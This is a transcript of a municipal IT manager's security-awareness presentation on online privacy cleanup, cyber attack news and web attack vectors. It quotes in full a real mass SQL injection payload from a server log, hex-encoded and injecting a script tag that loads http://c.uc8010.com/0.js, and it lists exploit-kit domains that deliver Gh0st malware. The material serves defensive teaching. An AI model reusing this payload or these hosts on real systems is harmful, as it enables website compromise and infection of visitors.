steven narvaez ccio / itsd mgr. city of deltona east central florida district director flgisa
DESCRIPTION
Steven Narvaez CCIO / ITSD Mgr. City of Deltona East Central Florida District Director FLGISA. 30 years of IT experience - PowerPoint PPT PresentationTRANSCRIPT
30 years of IT experience Two time winner of the Florida Local
Government Information Systems Association (FLGISA.org) Technology Achievement Award Program under the category of "Most Innovative Use of Technology Award".
FLGISA.ORG: What you need to know! WE ROCK!!!
Steven NarvaezCCIO / ITSD Mgr. City of Deltona
East Central Florida District Director FLGISA
See what information about you is available online
Check out Spokeo and Pipl Massive amounts of data compiled from a variety of
sources including public records and social networking sites about individuals.
Can be used by credit issuers, criminal profilers, employers, and others for any number of purposes, not necessarily intended by the data service providers.
Do You Really Know Where Your Personal Information Is?
Review your accounts Three options:
1. remove the data2. modify the privacy settings3. request that the account be deleted. If you are
going to request that the account be deleted, be sure to first remove all of the data.
Be sure to confirm that the account is deleted versus deactivated.
Clean up the data you can control
Contact site owners. Can’t find owners?
Look it up using the ³WHOIS² service for an administrative and technical contact for the site.
A “WHOIS” query can be done by visiting the website http://whois.net/
Opt out of data service providers.
Request cleanup of data you don¹t control
Data service providers provide lists of contact information to individuals or companies that request it.
They often charge a fee for this information. Data service providers allow individuals to opt out of
having their data published. Services are aggregators so the original source
provider of the information will also likely have to be contacted to remove your information.
The Privacy Rights Clearinghouse publishes the opt-out URL for over 240 of these types of services.
Use a professional service. Be aggressive about maintaining a cycle of checking
your public data and removing items which don¹t match your current risk tolerance.
Request cleanup of data you don¹t control
Privacy Rights Clearinghouse Opt-Out Urls: www.privacyrights.org/online-information-brokers-list
· Google support page for removal of data: http://support.google.com/webmasters/bin/answer.py?hl=en&answer=164133&topic=1724262&ctx=topic
· IT World Article, ³Rescue your Online Reputation²: www.itworld.com/it-managementstrategy/212115/seven-ways-rescue-your-online-reputation?page=0,2
· Times Article ³How to Fix (or Kill) Web Data About You²: www.nytimes.com/2011/04/14/technology/personaltech/14basics.html?_r=0
For More Information: Please visit:
Could foreign hackers take out America's electric grid? A new congressional report says it's a very real threat, with more than a dozen of nearly 100 electric utilities surveyed reporting constant or frequent cyber attacks, Reuters reports.
One utility said it was battered by a staggering 10,000 attacks a month; another reported daily such activity that is "automated and dynamic in nature, able to adapt to what is discovered during its probing process."
Threat is real AND it is EVOLVING ALL THE TIME!
US Power Co. cyber attacked 10,000 times a month!
Small Chinese ISP – IDC China Telecommunication briefly hijacked the internet by sending out wrong routing data Re-transmitted wrong routing data by state-owned China
Telecommunications, affected service providers around the world.
The event even made it into the '2010 US-China Economic and Security Review' commission report presented in November of that year to US Congress
For 18 minutes on April 8, China Telecom rerouted 15 percent of the internet's traffic through Chinese servers, affecting US government and military web sites.
Was / Is China testing a cyber attack capability? China Telecom called the April traffic re-direction an
accident.
China ISP takes internet for a ride
The damage so far could range from $25 billion to $100 billion, or up to 0.5% of GDP government analysts report.
Cyber spying is "just so widespread that it’s known to be a national issue at this point," says an Obama administration official.
Russia, Israel, and France have also delved into electronic espionage
Chinese officials deny such hacking. The New York Times and Wall Street Journal are
among several newspapers to cite recent hacking, the Daily Intelligencer notes.
China at Heart of Sweeping Cyber spying War on US
McAfee goofs up! Issued a faulty anti-virus update The now-infamous McAfee DAT file
5958 - which wreaked havoc on PCs of countless McAfee customers.
Caused malfunctions like the Microsoft 'Blue Screen of Death'
Created the effect of a denial-of-service.
McAfee's Oopsie
HTTP:A Criminal’sBest Friend Understanding the Problem in Four Parts
1. URL: Recipe for Disaster
2. Web Browser Ecosystem Vulnerable
3. Malware Defeats Anti-Virus Signatures
4. Web Servers Vulnerable
The Web Page: A Security Primer
How does a Web Page Work?1. HTML: Web site “recipe.”
Initial HTML retrieval provides “recipe". Browser then fetches all objects listed in initial HTML “recipe”.
2.Web Resources: The actual ingredients.Retrieved, per the HTML, from any specified location(s) Includes:
• Images• Scripts• Executable objects (“plug-ins”)• Other web pages
URLs in browser: 1 HTTP Gets: 162 Images: 66
from 18 domains including 5 separate 1x1 pixel invisibletracking images
Scripts: 87 from 7 domains
Cookies: 118 from 15 domains
8 Flash objects from 4 domains
BoingBoing.net: A popular blog
Recipe + Ingredients…Let’s cook!
Web page HTML is the recipe
Code snippets are website ingredients
The browser will fetcheach ingredient
Each ingredientinitiates a HTTPtransaction
Understanding the Problem in Four Parts
1. URL: Recipe for Disaster
2. Web Browser Ecosystem Vulnerable
3. Malware Defeats Anti-Virus Signatures
4. Web Servers Vulnerable
SANS Institute Top 20 Security Riskshttp://www.sans.org/top20/#c1
IE and Firefox vulnerable “…hundreds of vulnerabilities in ActiveX
controls installed by software vendors have been discovered.”
Media Players & Browser Helper Objects (BHO) RealPlayer, iTunes, Flash, QuickTime, Windows Media Explosion of BHOs and third-party plug-ins Plug-ins are installed (semi) transparently by
website(s). Users unaware an at-risk helper object or plug-in is installed … introducing more avenues for hackers to exploit users visiting malicious web sites.
Web Browser Ecosystem Vulnerable
Understanding the Problem in Four Parts
1. URL: Recipe for Disaster
2. Web Browser Ecosystem Vulnerable
3. Malware Defeats Anti-Virus Signatures
4. Web Servers Vulnerable
Malware Defeats Anti-Virus Signatures
Criminals have developed tools to mutate malware to deflect signature-based detection.
At a DefCon hacking conference, teams of researchers proved their success yet again.
Seven viruses and two exploits, all well-known, were mutated to defeat multiple anti-virus engines
Winning time: 2 hours, 25 minutes
SANS Institute Top 20 Security Riskshttp://www.sans.org/top20/#c1
“Web application vulnerabilities account for almost half the total number of vulnerabilities being discovered in the past year**. These vulnerabilities are being exploited widely to convert trusted web sites into malicious servers serving client-side exploits and phishing scams.”
Attack Vector: Vulnerable Web Servers
** including open-source and custom-built applications
How does the attack work?1. Web servers that present dynamic web pages often talk to
databases to retrieve the data.2. Web servers and databases use a popular language called
Structured Query Language (SQL) to describe the data requested.
3. SQL can also insert new data and update existing data.4. If a web server passes unvalidated input from fields on web
forms to the database, attackers can take advantage of hacks to issue their own SQL commands.
5. Those hacks can inject malicious code into the database…6. …and the web server will subsequently present this
malicious code from the database to unsuspecting users when they visit the website.
The process renders a formally good website into a malicious one without the knowledge of the site owner or the site’s visitors!
SQL Injection Attacks
2007-12-30 18:22:46 POST /crappyoutsourcedCMS.asp;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0×4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F0063002E007500630038003000310030002E0063006F006D002F0030002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);–178|80040e14|Unclosed_quotation_mark_before_the_character_string_’G;DECLARE_@S_NVARCHAR(4000);SET_@S=CAST(0×4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C00400043002000′. - 202.101.162.73 HTTP/1.0 Mozilla/3.0+(compatible;+Indy+Library) - 500 15248
Real-World SQL InjectionHTTP Post made to thousands of web servers
What that POST is attempting: …exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+’
'<script src=http://c.uc8010.com/0.js></script>’'')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor DECLARE @T varchar(255)…
Attack inserts script into text fields in database
<script src=http://?.uc8010.com/0.js></script>
Site owner unaware their site was hacked Site visitors will fetch the malicious script Script used to deliver any web attack
SQL Injection Decoded
Hacked While BrowsingBehind the Scenes
What’s Happening on BrookeSeidl.com brookeseidl.com registered at eNom 2002 63.249.17.64 hosted at Seattle’s ZipCon with
52 other domains
Script injected onto web page – one extra ingredient!
What Does Tejary.net/h.js Do? Browser fetches h.js javascript from tejary.net Tejary.net registered 2003 at GoDaddy and
hosted on 68.178.160.68 in Arizona Registered by Aljuraid, Mr Nassir A in Saudi
Arabia Tejary.net/h.js calls two remote iframe objects
Browser fetches /Bb/faq.htm from www.said7.com
Said7.com Registered 2006 at NAMESECURE.COM
Hosted on 74.52.143.60 at ThePlanet, Houston, TX
Calls web form from 51yes.com Calls v3i9.cn/c.htm as iFrame <script language="javascript"
src="http://count49.51yes.com/click.aspx?id=494953024&logo=11"></script> <iframe src=http://www.v3i9.cn/c.htm width=100 height=0></iframe>
What Does said7.com Do?
Exploit Resources Fetched from v3i9.cn
It all starts with /c.htm loaded from tejary.net, said7.comReal Player Exploit /ipp.htm – Real Player exploit CVE-2008-1309 2/40 AV anti-virus vendors detect, calls real.html. Includes f#!kyoukaspersky
/real.htm, /real.js – Real Player exploit CVE-2007-5601
MDAC (Microsoft Data Access Component) Exploit /14.htm, /14.js – exploits Exploit-MS06-014 vulnerability in the MDAC functions
Flash Exploit /swfobject.js – detects flash version and selects according content /flash.htm – Flash exploit. 2/40 anti-virus vendors detect /igg.htm - ??? Called from /flash.htm for exploit?
After successful exploit, malware installed from v3i9.cn
ce.exe = Gh0st malwareKeylogging, web cam monitoringPersistent connection to China: 58.253.68.68 vobe.3322.org
What is Our Malware?
Anti-Virus Won’t Protect us Ce.exe analyzed
on Virus Total31% detection on days 1, 2
48% detection on day 3
21% detection for SMS.exe
“The cost of protecting ourselves against cybercrime can far exceed the cost of the threat itself … [therefore] we should spend less in anticipation of cybercrime and more on catching the perpetrators.”
“We distinguish carefully between traditional crimes that
are now ‘cyber’ because they are conducted online (such as tax and welfare fraud); transitional crimes whose modus operandi has changed substantially as a result of the move online (such as credit card fraud); new crimes that owe their existence to the Internet; and what we might call platform crimes such as the provision of botnets which facilitate other crimes rather than being used to extract money from victims directly.”
Protection - Prevention
UK is spending ~$1 billion on efforts to protect against or clean-up after a threat, including $170 million on antivirus measures, but only $15 million is being spent on law enforcement to pursue cyber criminals.
Shouldn’t we spend some time on stopping the threat by apprehending the criminals?
The Cost
Thank you for the opportunity to have this chat!
Questions?
Fade to BLACK